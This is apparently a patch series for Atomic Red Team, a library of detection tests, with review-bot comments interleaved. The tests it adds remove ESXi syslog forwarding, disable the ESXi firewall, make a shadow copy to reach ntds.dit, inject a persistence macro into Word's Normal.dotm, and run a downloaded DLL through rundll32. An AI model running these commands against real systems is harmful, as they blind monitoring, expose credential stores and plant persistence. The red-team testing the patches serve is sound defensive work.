+ +## Atomic Test #10 - ESXi - Remove Syslog remote IP + An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8241dda4-962e-11ee-b9d1-0242ac120002 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| vm_host | Name or IP of the ESXI host | string | atomic.local | +| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1560.001\bin\plink.exe' | +| username | Username used to log into ESXi | string | root | +| password | Password used to log into ESXI | string | n/a | + +#### Attack Commands: Run with `powershell`! + + +```powershell + # Extract line with IP address from the syslog configuration output + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt + + # Replace the IP with "0" + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt + + # Extract the IP from the line extracted from findstr + $inputFilePath = "c:\temp\loghost.txt" + $outputFilePath = "c:\temp\loghost_ip.txt" + + $fileContent = Get-Content -Path $inputFilePath -Raw + + if ([string]::IsNullOrWhiteSpace($fileContent)) { + Write-Host "The content is $fileContent" + Write-Host "The file is empty" + } else { + # Use a regular expression to extract IP addresses + $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value + + $output = "esxcli system syslog config set --loghost=" + $ipAddresses + + $output | Out-File -FilePath $outputFilePath -Encoding ascii + + Write-Host "IP addresses extracted and saved to $outputFilePath" +} +``` + +#### Cleanup Commands: +```powershell + # Re-add the initially extracted IP + 
#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt + + rm c:\temp\loghost_ip.txt + rm c:\temp\loghost.txt +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Check if plink is available. +##### Check Prereq Commands: +```powershell +if (Test-Path "#{plink_file}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +``` + + + + +
\ No newline at end of file diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index 348d3b6ddd..2104fbdd1b 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml 
@@ -315,5 +315,73 @@ atomic_tests: cleanup_command: 'rm -rf #{input_folder}' name: bash elevation_required: false +- name: ESXi - Remove Syslog remote IP + auto_generated_guid: 8241dda4-962e-11ee-b9d1-0242ac120002 + description: | + An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe' + username: + description: Username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: | + The plink executable must be found in the ExternalPayloads folder. + prereq_command: | + if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: | + # Extract line with IP address from the syslog configuration output + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." 
> c:\temp\loghost.txt + + # Replace the IP with "0" + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt + + # Extract the IP from the line extracted from findstr + $inputFilePath = "c:\temp\loghost.txt" + $outputFilePath = "c:\temp\loghost_ip.txt" + + $fileContent = Get-Content -Path $inputFilePath -Raw + + if ([string]::IsNullOrWhiteSpace($fileContent)) { + Write-Host "The content is $fileContent" + Write-Host "The file is empty" + } else { + # Use a regular expression to extract IP addresses + $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value + + $output = "esxcli system syslog config set --loghost=" + $ipAddresses + + $output | Out-File -FilePath $outputFilePath -Encoding ascii + + Write-Host "IP addresses extracted and saved to $outputFilePath" + } + + cleanup_command: | + # Re-add the initially extracted IP + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt + + rm c:\temp\loghost_ip.txt + rm c:\temp\loghost.txt + name: powershell + elevation_required: true \ No newline at end of file diff --git a/atomics/T1560.001/src/esxi_get_loghost.txt b/atomics/T1560.001/src/esxi_get_loghost.txt new file mode 100644 index 0000000000..217d1884c0 --- /dev/null +++ b/atomics/T1560.001/src/esxi_get_loghost.txt @@ -0,0 +1 @@ +esxcli system syslog config get \ No newline at end of file diff --git a/atomics/T1560.001/src/esxi_remove_loghost.txt b/atomics/T1560.001/src/esxi_remove_loghost.txt new file mode 100644 index 0000000000..5ab74451d4 --- /dev/null +++ b/atomics/T1560.001/src/esxi_remove_loghost.txt @@ -0,0 +1 @@ +esxcli system syslog config set --loghost=0 diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index 7b148c4874..8196b11c2c 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md 
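Review bot: In `command` of the T1560.001.yaml hunk, the `esxi_remove_loghost.txt` step sets the host's loghost to `0` before the restore file `c:\temp\loghost_ip.txt` has been written, and that file is only produced in the `else` branch. If `c:\temp` does not exist or the extraction yields nothing, remote syslog is already disabled and `cleanup_command` has no valid command to replay, so the ESXi host is left without log forwarding. I would create the directory first (`New-Item -ItemType Directory c:\temp -ErrorAction Ignore | Out-Null`) and move the remove-loghost plink call into the `else` branch after `Out-File`, so logging is only switched off once a restore command exists. The dots between octets in the `[regex]::Matches` pattern are unescaped and match any character; `\.` would restrict the match to an address.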
@@ -50,6 +50,7 @@ Modifying or disabling a system firewall may enable adversary C2 communications, - [Atomic Test #22 - Blackbit - Disable Windows Firewall using netsh firewall](#atomic-test-22---blackbit---disable-windows-firewall-using-netsh-firewall) +- [Atomic Test #23 - ESXi - Disable Firewall via Esxcli](#atomic-test-23---esxi-disable-firewall-via-esxcli)
@@ -968,3 +969,51 @@ netsh firewall set opmode mode=enable >nul 2>&1
+
+ +## Atomic Test #23 - ESXi - Disable Firewall via Esxcli + Adversaries may disable the ESXI firewall via ESXCLI + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8710d396-96e5-11ee-b9d1-0242ac120002 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| vm_host | Name or IP of the ESXI host | string | atomic.local | +| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1562.004\bin\plink.exe' | +| username | Username used to log into ESXi | string | root | +| password | Password used to log into ESXI | string | n/a | + +#### Attack Commands: Run with `powershell`! + + +```cmd + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt +``` + +#### Cleanup Commands: +```cmd + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Check if plink is available. +##### Check Prereq Commands: +```powershell +if (Test-Path "#{plink_file}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +``` + +
\ No newline at end of file diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index 4e0e582201..687398abe6 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -439,3 +439,42 @@ atomic_tests: netsh firewall set opmode mode=enable >nul 2>&1 name: command_prompt elevation_required: true +- name: ESXi - Disable Firewall via Esxcli + auto_generated_guid: 8710d396-96e5-11ee-b9d1-0242ac120002 + description: | + Adversaries may disable the ESXI firewall via ESXCLI + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe' + username: + description: username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: | + The plink executable must be found in the ExternalPayloads folder. + prereq_command: | + if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: | + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt + cleanup_command: | + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt + name: command_prompt + elevation_required: false \ No newline at end of file diff --git a/atomics/T1562.004/src/esxi_disable_firewall.txt b/atomics/T1562.004/src/esxi_disable_firewall.txt new file mode 100644 index 0000000000..b5b1bfb1ef 
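Review bot: `-pw #{password}` in `command` and `cleanup_command` puts the ESXi login password on the plink command line, where process-creation logging and EDR command-line capture on the test machine record it in clear text; the T1560.001.yaml hunk in this commit does the same. Since this test is meant to run under exactly that telemetry, key-based authentication (`-i PATH_TO_PRIVATE_KEY`) or plink's password-file option (`-pwfile`, available in recent PuTTY releases) would keep the credential out of the logs. At minimum the input should say so: `description: password used to log into ESXi (lab-only account; value appears in command-line logs)`. plink is also invoked without `-batch`, so a first connection to a host whose key is not cached waits for input instead of failing.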
--- /dev/null +++ b/atomics/T1562.004/src/esxi_disable_firewall.txt @@ -0,0 +1 @@ +esxcli network firewall set --enabled false diff --git a/atomics/T1562.004/src/esxi_enable_firewall.txt b/atomics/T1562.004/src/esxi_enable_firewall.txt new file mode 100644 index 0000000000..277d540e07 --- /dev/null +++ b/atomics/T1562.004/src/esxi_enable_firewall.txt @@ -0,0 +1 @@ +esxcli network firewall set --enabled true \ No newline at end of file From 1eed144a1e85362f0afb14ab61996e16847ed805 Mon Sep 17 00:00:00 2001 From: publish bot Date: Thu, 22 Feb 2024 19:49:03 +0000 Subject: [PATCH 09/41] updating atomics count in README.md [ci skip] --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1569ca6fee..8dfb9c2443 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ # Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1515-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1518-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use From df24b972a9698627a1de4586b294d3a3bfe12c77 Mon Sep 17 00:00:00 2001 
From: jianni20 <11943867+jianni20@users.noreply.github.com> Date: Thu, 22 Feb 2024 15:06:29 -0500 Subject: [PATCH 10/41] New test: T1003.003 - Create Volume Shadow Copy with diskshadow (#2690) * New test - Create Volume Shadow Copy with diskshadow * Fix typos * fix indentation * Update T1003.003.yaml * Update T1003.003.yaml --------- Co-authored-by: Carrie Roberts --- atomics/T1003.003/T1003.003.yaml | 18 ++++++++++++++++++ atomics/T1003.003/src/diskshadow.txt | 5 +++++ 2 files changed, 23 insertions(+) create mode 100644 atomics/T1003.003/src/diskshadow.txt diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml index 02bb903f95..4a82ae2844 100644 --- a/atomics/T1003.003/T1003.003.yaml +++ b/atomics/T1003.003/T1003.003.yaml @@ -242,3 +242,21 @@ atomic_tests: mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 name: command_prompt elevation_required: true + +- name: Create Volume Shadow Copy with diskshadow + description: | + This test is intended to be run on a domain controller + An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit + supported_platforms: + - windows + input_arguments: + filename: + description: Location of the script + type: Path + default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt + executor: + command: | + mkdir c:\exfil + diskshadow.exe /s #{filename} + name: command_prompt + elevation_required: true diff --git a/atomics/T1003.003/src/diskshadow.txt b/atomics/T1003.003/src/diskshadow.txt new file mode 100644 index 0000000000..9485115ca0 --- /dev/null +++ b/atomics/T1003.003/src/diskshadow.txt @@ -0,0 +1,5 @@ +set context persistent nowriters +set metadata C:\exfil\metadata.cab +add volume c: alias loot +create +expose %loot% s: \ No newline at end of file From 9628658dbaec4b0897edc7f354dcbc0024fca3aa Mon Sep 17 00:00:00 2001 
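Review bot: The new T1003.003 test has no `cleanup_command`, although `diskshadow.txt` uses `set context persistent nowriters` and `expose %loot% s:`, so after a run the machine keeps a persistent shadow copy of `c:` mounted as `S:` together with the `c:\exfil` directory. On the domain controller this test is intended for, that leaves a readable copy of the volume in place until someone removes it by hand. I would add a cleanup that removes both, for example a second script containing `delete shadows exposed s:` run through `diskshadow.exe /s`, followed by `rmdir /s /q c:\exfil`. `mkdir c:\exfil` also errors on a repeat run when the directory exists; `if not exist c:\exfil mkdir c:\exfil` avoids that.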
From: publish bot Date: Thu, 22 Feb 2024 20:07:05 +0000 Subject: [PATCH 11/41] updating atomics count in README.md [ci skip] --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8dfb9c2443..e2e2354a09 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ # Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1518-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1519-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use From 0bd9b1acc11e7d0bde639cd3ab54432be6236e5e Mon Sep 17 00:00:00 2001 From: Daniel Cortez <32076062+DefenderDaniel@users.noreply.github.com> Date: Thu, 22 Feb 2024 12:56:04 -0800 Subject: [PATCH 12/41] New Test T1137.001 - 'Office Application Startup: Office Template Macros.' (#2694) * Create T1137.001.yml Created new Directory and new test for T1137.001 * Rename T1137.001.yml to T1137.001.yaml * Update T1137.001.yaml --------- Co-authored-by: Carrie Roberts --- atomics/T1137.001/T1137.001.yaml | 145 +++++++++++++++++++++++++++++++ 1 file changed, 145 insertions(+) create mode 100644 atomics/T1137.001/T1137.001.yaml diff --git a/atomics/T1137.001/T1137.001.yaml b/atomics/T1137.001/T1137.001.yaml new file mode 100644 index 0000000000..2d74695135 --- /dev/null +++ b/atomics/T1137.001/T1137.001.yaml 
@@ -0,0 +1,145 @@ +attack_technique: T1137.001 +display_name: 'Office Application Startup: Office Template Macros.' +atomic_tests: +- name: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell + description: | + Injects a Macro in the Word default template "Normal.dotm" and makes it execute each time that Word is opened. In this test, the Macro creates a sheduled task to open Calc.exe every evening. + supported_platforms: + - windows + dependencies: + - description: | + Microsoft Word must be installed + prereq_command: | + try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft Word manually to meet this requirement" + executor: + name: powershell + elevation_required: true + command: | + # Registry setting to "Trust access to the VBA project object model" in Word + $registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security" + $registryValue = "AccessVBOM" + $registryData = "1" + # The path where a flag text file will be created if Registry setting did not already exist or if it was set to 0 + $flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt" + $flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt" + # Get the value of the Key/Value pair + $value = (Get-ItemProperty -Path $registryKey -Name $registryValue -ErrorAction SilentlyContinue).$registryValue + # Logical operation to: if the value of the key/value is 1, do nothing - + # if the value is 0, change it to 1 and create flag1 - + # if it doesn't exist, create the value and flag2 + if ($value -eq "1") + { + Write-Host "The registry value '$registryValue' already exists with the required setting." + } + elseif ($value -eq "0") + { + Write-Host "The registry value was set to 0, temporarily changing to 1." 
+ New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null + echo "flag1" > $flagPath1 + } + else + { + Write-Host "The registry value '$registryValue' does not exist, temporarily creating it." + New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null + echo "flag2" > $flagPath2 + } + Add-Type -AssemblyName Microsoft.Office.Interop.Word + # Define the path of copied normal template for restoral + $copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm" + # Define the path to the normal template + $docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm" + # Create copy of orginal template for restoral + Copy-Item -Path $docPath -Destination $copyPath -Force + # VBA code to be insterted as a Macro + # Will create a scheduled task to open the Calculator at 8:04pm daily + $vbaCode = @" + Sub AutoExec() + Dim applicationPath As String + Dim taskName As String + Dim runTime As String + Dim schTasksCmd As String + applicationPath = "C:\Windows\System32\calc.exe" + taskName = "OpenCalcTask" + runTime = "20:04" + schTasksCmd = "schtasks /create /tn """ & taskName & """ /tr """ & applicationPath & """ /sc daily /st " & runTime & " /f" + Shell "cmd.exe /c " & schTasksCmd, vbNormalFocus + End Sub + "@ + # Create a new instance of Word.Application + $word = New-Object -ComObject Word.Application + # Keep the Word application hidden + $word.Visible = $false + # Open the document + $document = $word.Documents.Open($docPath) + # Access the VBA project of the document + $vbaProject = $document.VBProject + # Add a new module to the VBA project + $newModule = $vbaProject.VBComponents.Add(1) # 1 = vbext_ct_StdModule + # Add the VBA code to the new module + $newModule.CodeModule.AddFromString($vbaCode) + # Run the Macro + $word.run("AutoExec") + # Save and close the document + $document.SaveAs($docPath) + $document.Close() + 
# Quit Word + $word.Quit() + # Release COM objects + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) | Out-Null + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) | Out-Null + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) | Out-Null + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) | Out-Null + cleanup_command: | + # Registry setting to "Trust access to the VBA project object model" in Word + $registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security" + $registryValue = "AccessVBOM" + $registryData1 = "1" + $registryData0 = "0" + # Defines the path each flag file created depending on the original registry state + $flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt" + $flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt" + # Define the path of copied normal template for restoral + $copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm" + # Define the path to the normal template + $docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm" + # Delete the scheduled task created by the Macro + schtasks /Delete /TN "OpenCalcTask" /F | Out-Null + #Restore the orginal template if the backup copy exists + if (Test-Path $copyPath) + { + #Delete the injected template + Remove-Item -Force $docPath -ErrorAction SilentlyContinue + # Restore the original template + Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction SilentlyContinue + Write-Host "The original template has been restored" + } + else + { + Write-Host "The original template is present" + } + #Restore the original state of the registry key + if (Test-Path $flagPath1) + { + # The value was originally 0, set back to 0 + New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD -Force | Out-Null + Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue + 
Write-Host "The original registry state has been restored" + } + elseif (Test-Path $flagPath2) + { + #The value did not previously exist, delete the value + Remove-ItemProperty -Path $registryKey -Name $registryValue | Out-Null + Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue | Out-Null + Write-Host "The original registry state has been restored" + } + else + { + # The value was already 1, do nothing + Write-Host "The value $registryValue already existed in $registryKey." + } From b96b30d3949000db84b3a4a37a1364aabb02aa52 Mon Sep 17 00:00:00 2001 From: publish bot Date: Thu, 22 Feb 2024 20:56:39 +0000 Subject: [PATCH 13/41] updating atomics count in README.md [ci skip] --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e2e2354a09..be8ba3c705 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ # Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1519-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1520-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use From 1202d62c59cdea6715f581f669c833067fce4d6b Mon Sep 17 00:00:00 2001 
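Review bot: `prereq_command` finishes its check with `Stop-Process -Name "winword"`, which terminates every running Word process on the machine, including documents the operator has open, rather than only the COM instance the check created. Holding the object and quitting it is enough: `$w = New-Object -COMObject "Word.Application"; $w.Quit()`. In `command`, the automation between `New-Object -ComObject Word.Application` and `$word.Quit()` has no `try`/`finally`, so an exception while opening `Normal.dotm` leaves a hidden `winword` process running and `AccessVBOM` set to 1 until cleanup is run. The registry path is fixed to `Office\16.0`, so the description should state that other Office versions are not covered.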
From: KillrBunn3 Date: Thu, 22 Feb 2024 16:29:05 -0500 Subject: [PATCH 14/41] New test: T1218.011 Gamarue tradecraft commandline with rundll32 execution (#2678) * New test: T1218.011 Gamarue tradecraft commandline with rundll32 execution * Update T1218.011.yaml * Update T1218.011.yaml --------- Co-authored-by: Carrie Roberts --- atomics/T1218.011/T1218.011.yaml | 27 +++++++++++++++++++++++++++ atomics/T1218.011/bin/_WT.init | Bin 0 -> 3584 bytes 2 files changed, 27 insertions(+) create mode 100644 atomics/T1218.011/bin/_WT.init diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 53d7449373..6464ce738d 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml 
@@ -295,3 +295,30 @@ atomic_tests:
 copy #{exe_to_launch} not_an_scr.scr
 rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
 cleanup_command: del not_an_scr.scr
+
+- name: Running DLL with .init extension and function
+ description: |
+ This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
+ DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_file:
+ description: The DLL file to be called
+ type: string
+ default: PathToAtomicsFolder\T1218.011\bin\_WT.init
+ dll_url:
+ description: The URL to the DLL file that must be downloaded
+ type: url
+ default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
+ dependency_executor_name: powershell
+ dependencies:
+ - description: The DLL file to be called must exist at the specified location (#{dll_file})
+ prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+ executor:
+ command: |
+ rundll32.exe #{dll_file},krnl
+ name: command_prompt
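Review bot: The new test's `get_prereq_command` downloads `_WT.init` from the mutable `raw/master` URL in `dll_url`, and the executor then loads that file with rundll32 without any integrity check, so whatever that URL serves at run time is what executes on the test host. I would pin `dll_url` to a commit-specific raw URL and verify the download against a recorded digest, e.g. `if ((Get-FileHash "#{dll_file}" -Algorithm SHA256).Hash -ne '<EXPECTED_SHA256_PLACEHOLDER>') { Remove-Item "#{dll_file}"; exit 1 }`, and state that digest in the description, since the DLL is committed as an opaque binary. Separately, `rundll32.exe #{dll_file},krnl` leaves the path unquoted, so a `PathToAtomicsFolder` containing spaces would likely be mis-parsed; `rundll32.exe "#{dll_file}",krnl` avoids that. The test also defines no `cleanup_command`, unlike the test just above it in the file.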
diff --git a/atomics/T1218.011/bin/_WT.init b/atomics/T1218.011/bin/_WT.init new file mode 100644 index 0000000000000000000000000000000000000000..19114b69cf997560922bfb630492b90a07b056b4 GIT binary patch literal 3584 zcmeHJOKenC82;|GQ_299mWN;jZ&MzXn42~&72<0iOsB0atxOAPL!@_RPTDJX?w#DZ zEsqd`22D&{=*GmjVL^0ZOk9{ij8PV@4D8&vFk$1;xX_Kp1i$~BnGV#z!X1Wx=KSY> zo%27=>rO3vfHnZ_YEx`)Ya6MoaA zll)kdVeiE1e9V5|1|pkHa&5#-N`nn7I`xVhy8z2%au=JFFfB*}H=RiNVYw0OB6VW7 zE^yjqDZL-0t^|oKfh69y8B@o?yd=rw;06)aW`=XdU1`jJ&T)o0)zMw+e!a|rzrmo zHnC$J#BOcrU=v2+U>kRMfcDE+2W9$h951aIz>E$~?t>;AWj1T@;#62!@zu*HUZ}^a z>YP{!Vy~*4Tv)AnzKV(}TJ_4R4kK`5FAPp7-#xFXdM4&tl~!T}ryPe78pFky1|`q; z;tMSs;{(&BH&i)pdYp0tcS%)M5IdQbIIQZ4F%zDn^JV4x$VJMfgGPX}a>(*QIjnGx zU`fSi<^qqLVuZn}ieijLVKwX4)yS~fNGPbdL1ikHVmb0^YtD0_?=u!ARd-BStcRk{ zHTmKoW{Qo7$Ai`ItU`uSdgXjjsfAt;XVtR1>V=V0VXW19IgEU-gjrROG39!}1FU5M z-hS&8&hh*fkwF1-#0yv=UtiQOGRQoIisRwmfHQ&bLgez>yi8)brO!jcMK`mDN;%BQhxK_*(JIYkv}NUdLm2 z<6rW5l`X@KD*h!trR`0;;;$92$*1MNpyyklO%|)fWArWlC2Gk(k9lHKj|-#q6Krgc72g;71;)&6C?$=8e@B5&$9sq-sn{Sji5ujF&D{7zKBw_7Ib|r1AYfrMn zPV{tlCHVC1=-FfS^mbmqc>3h-;XChj4t{s!Q?&(tEYSIDl){~{YdkgPs`n$#2P5?OWD&ggtOJ l3VfVCb86P{0#BaR$MC3Dz&77nH%IK}AJr5d$Nk?c@DI^>dAR@p literal 0 HcmV?d00001 From 2207b5435e1a0fdb37783f53f3bf24f7ce657679 Mon Sep 17 00:00:00 2001 From: publish bot Date: Thu, 22 Feb 2024 21:29:45 +0000 Subject: [PATCH 15/41] updating atomics count in README.md [ci skip] --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index be8ba3c705..38fbbff467 100644 --- a/README.md +++ b/README.md 
@@ -2,7 +2,7 @@ # Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1520-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1521-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use From bf630ecb29a0e53b35357072c14197a8450165b3 Mon Sep 17 00:00:00 2001 From: Hare Sudhan Date: Sat, 24 Feb 2024 20:14:49 -0500 Subject: [PATCH 16/41] fix guid error (#2696) --- atomics/T1110.001/T1110.001.yaml | 1 - atomics/T1560.001/T1560.001.yaml | 1 - atomics/T1562.004/T1562.004.yaml | 1 - 3 files changed, 3 deletions(-) diff --git 